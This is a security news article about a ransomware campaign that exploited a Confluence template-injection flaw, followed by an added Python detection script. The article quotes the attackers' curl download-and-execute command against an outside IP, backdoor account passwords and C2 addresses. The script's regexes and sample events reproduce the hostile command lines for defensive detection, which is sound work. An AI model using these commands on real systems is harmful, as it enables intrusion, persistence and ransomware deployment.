Cybersecurity researchers have uncovered a targeted attack campaign exploiting a known vulnerability in Atlassian Confluence servers to gain unauthorized access and deploy ransomware.
The attackers exploited CVE-2023-22527, a template injection flaw, to achieve remote code execution (RCE) on unpatched servers. The initial compromise occurred in June 2024, but the ransomware was deployed approximately 62 hours later, showing a patient and methodical approach.
Initial Access Through Confluence Vulnerability
After exploiting the vulnerability, attackers executed arbitrary commands on the system. They immediately deployed a Metasploit payload, established command and control (C2) communication, and installed AnyDesk for persistent access.
The following command was used during the attack:
cmd.exe /c "curl -sko %%TEMP%%\HAHLGiDDb.exe https://91.191.209.46:8080/YlDRANysdqsFrhht5dDNDw & start /B %%TEMP%%\HAHLGiDDb.exe"
This downloaded and executed a loader, which connected to a remote C2 server. The loader imported only basic Windows APIs (VirtualAlloc and ExitProcess) and resolved the rest dynamically through obfuscation, a common trait of Metasploit payloads.
Privilege Escalation and Credential Theft
Once inside the network, attackers escalated privileges and used tools like Mimikatz to steal credentials. They enabled Remote Desktop Protocol (RDP) and moved laterally before deploying ELPACO-team ransomware, a variant of Mimic ransomware.
The DFIR Report analysis found that attackers used repeatable methods, suggesting the use of automation or predefined attack playbooks.
Persistent Access with AnyDesk and New Admin Accounts
The attackers installed AnyDesk.exe in the Confluence installation directory and configured it for unattended access with the password P@ssword1.
They executed the following command to configure the connection:
C:\Windows\system32\cmd.exe /S /D /c "echo P@ssword1"
To further ensure access, they created a local admin account named noname with the password Slepoy_123.
This was done via a batch file using WMIC commands, and the account was configured so the password would never expire. Logs showed the account was created three times, indicating a systematic persistence strategy.
RDP Enablement and Registry Changes
To retain access even if the vulnerability was later patched, the attackers enabled RDP by editing Windows registry values and modifying firewall rules. These changes overrode the host's default configuration and allowed remote desktop access at multiple stages of the intrusion.
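As an added, defender-side example (not code from the article or from The DFIR Report), the following Python scans process-creation telemetry for the three behaviours described above: the cmd.exe download-and-execute one-liner spawned from the Confluence JVM, the local admin account created and set to never expire via net.exe and WMIC, and the RDP enablement through the registry and firewall. The event fields, the regular expressions and the sample events (placeholder IP, paths and password) are this example's own assumptions, not the real indicators.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """One process-creation record (Sysmon Event ID 1 / Security 4688 style; assumed field set)."""
    image: str          # full path of the new process
    parent_image: str   # full path of the parent process
    user: str           # account the process runs as
    command_line: str   # full command line


def _cmd(pattern: str):
    """Build a predicate that matches `pattern` against the command line, case-insensitively."""
    rx = re.compile(pattern, re.IGNORECASE)
    return lambda ev: rx.search(ev.command_line) is not None


# Detection rules: (rule name, predicate over a ProcEvent). The regexes are this
# example's own and should be tuned to local telemetry before production use.
RULES = [
    # Confluence's JVM should never be spawning a command shell.
    ("web_app_spawned_shell",
     lambda ev: ev.image.lower().endswith("cmd.exe")
     and "confluence" in ev.parent_image.lower()),
    # Download into %TEMP% and launch it in the same one-liner (curl -o ... & start ...).
    ("download_and_execute_from_temp",
     _cmd(r"\b(curl|certutil|bitsadmin)\b.*%temp%.*(&|\|).*\bstart\b")),
    ("local_account_created",
     _cmd(r"\bnet1?(\.exe)?\s+user\s+\S+\s+\S+\s+/add\b")),
    ("added_to_local_admins",
     _cmd(r"\bnet1?(\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add\b")),
    ("password_never_expires",
     _cmd(r"\bwmic(\.exe)?\s+useraccount\b.*\bpasswordexpires\s*=\s*false")),
    ("rdp_enabled_via_registry",
     _cmd(r"\breg(\.exe)?\s+add\b.*terminal server.*fdenytsconnections.*/d\s*0\b")),
    ("rdp_firewall_rule_opened",
     _cmd(r"\bnetsh(\.exe)?\s+advfirewall\s+firewall\s+set\s+rule\b.*remote desktop.*enable=yes")),
]

# Constructed sample telemetry modelled on the behaviours in the article.
# IP address, file names and password are placeholders, not the real indicators.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Confluence\jre\bin\java.exe",
              r"NT AUTHORITY\NETWORK SERVICE",
              r'cmd.exe /c "curl -sko %TEMP%\stage.exe https://203.0.113.10:8080/payload & start /B %TEMP%\stage.exe"'),
    ProcEvent(r"C:\Windows\System32\net.exe", r"C:\Windows\System32\cmd.exe",
              r"CORP\svc-confluence", "net user noname Placeholder_Pw1 /add"),
    ProcEvent(r"C:\Windows\System32\net.exe", r"C:\Windows\System32\cmd.exe",
              r"CORP\svc-confluence", "net localgroup administrators noname /add"),
    ProcEvent(r"C:\Windows\System32\wbem\WMIC.exe", r"C:\Windows\System32\cmd.exe",
              r"CORP\svc-confluence",
              "wmic useraccount where \"name='noname'\" set PasswordExpires=false"),
    ProcEvent(r"C:\Windows\System32\reg.exe", r"C:\Windows\System32\cmd.exe",
              r"CORP\svc-confluence",
              r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'),
    ProcEvent(r"C:\Windows\System32\netsh.exe", r"C:\Windows\System32\cmd.exe",
              r"CORP\svc-confluence",
              'netsh advfirewall firewall set rule group="remote desktop" new enable=Yes'),
    # Benign activity that must not fire.
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\explorer.exe",
              r"CORP\alice", r'cmd.exe /c "dir C:\Users\alice\Documents"'),
    ProcEvent(r"C:\Windows\System32\reg.exe", r"C:\Windows\System32\cmd.exe",
              r"CORP\admin",
              r'reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections'),
]


def scan(events):
    """Return every (rule_name, event) pair that fires."""
    return [(name, ev) for ev in events for name, pred in RULES if pred(ev)]


def rules_by_user(events):
    """Map each account to the set of rules it tripped. One principal tripping the
    account-creation, never-expire and RDP rules inside a short window is the kind
    of repeatable playbook the article describes, and is worth an alert on its own."""
    tripped = {}
    for name, ev in scan(events):
        tripped.setdefault(ev.user, set()).add(name)
    return tripped


if __name__ == "__main__":
    for user, names in sorted(rules_by_user(SAMPLE_EVENTS).items()):
        print(f"{user}: {', '.join(sorted(names))}")
```

Correlating by account rather than alerting on each rule separately keeps single `reg query` or `net user` look-ups from paging anyone, while the sequence the article describes (shell from the web application, staged download, new admin, RDP opened) still surfaces as one grouped finding.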
Attack Infrastructure and Indicators
The IP address 45.227.254.124 was used both for the initial scans and later for hosting AnyDesk, indicating preplanned infrastructure. Traffic logs confirmed the use of this IP throughout various phases of the attack.
Conclusion
This campaign shows how attackers combine known vulnerabilities with commercial tools like AnyDesk to carry out stealthy and persistent intrusions. Security teams are advised to patch Confluence servers, monitor for unauthorized admin account creation, and audit remote access tools on internal systems.